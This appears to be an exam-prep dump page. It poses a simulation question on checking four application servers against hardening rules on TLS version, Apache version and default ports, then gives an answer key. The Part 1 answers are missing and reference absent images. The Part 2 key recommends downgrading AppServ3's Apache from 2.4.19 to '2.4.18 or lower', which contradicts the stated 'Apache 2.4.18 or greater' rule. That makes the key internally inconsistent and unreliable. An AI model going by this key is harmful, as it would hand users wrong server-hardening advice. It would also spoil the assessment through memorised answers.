Correct Answer: Answer: see the answer below in explanation:
Explanation

Explanation/Reference:
Answer below images
QUESTION 3
SIMULATION

You are a cybersecurity analyst tasked with interpreting scan data from Company A's servers. You must
verify the requirements are being met for all of the servers and recommend changes if you find they are not.

The company's hardening guidelines indicate the following:

TLS 1.2 is the only version of TLS running.
Apache 2.4.18 or greater should be used.
Only default ports should be used.

INSTRUCTIONS

Using the supplied data, record the status of compliance with the company's guidelines for each server.

The question contains two parts: make sure you complete Part 1 and Part 2. Make recommendations for
issues based ONLY on the hardening guidelines provided.

Part 1:

AppServ1:
AppServ2:

AppServ3:
AppServ4:
Part 2:
Correct Answer: Answer: check the explanation part below for the solution:
Explanation
Explanation/Reference:
Part 1:

Part 2:
Based on the compliance report, I recommend the following changes for each server:
AppServ1: No changes are needed for this server.
AppServ2: Disable or upgrade TLS 1.0 and TLS 1.1 to TLS 1.2 on this server to ensure secure encryption
and communication between clients and the server. Update Apache from version 2.4.17 to version 2.4.18
or greater on this server to fix any potential vulnerabilities or bugs.
AppServ3: Downgrade Apache from version 2.4.19 to version 2.4.18 or lower on this server to ensure
compatibility and stability with the company's applications and policies. Change the port number from 8080
to either port 80 (for HTTP) or port 443 (for HTTPS) on this server to follow the default port convention and
avoid any confusion or conflicts with other services.
AppServ4: Update Apache from version 2.4.16 to version 2.4.18 or greater on this server to fix any
potential vulnerabilities or bugs. Change the port number from 8443 to either port 80 (for HTTP) or port 443
(for HTTPS) on this server to follow the default port convention and avoid any confusion or conflicts with
other services.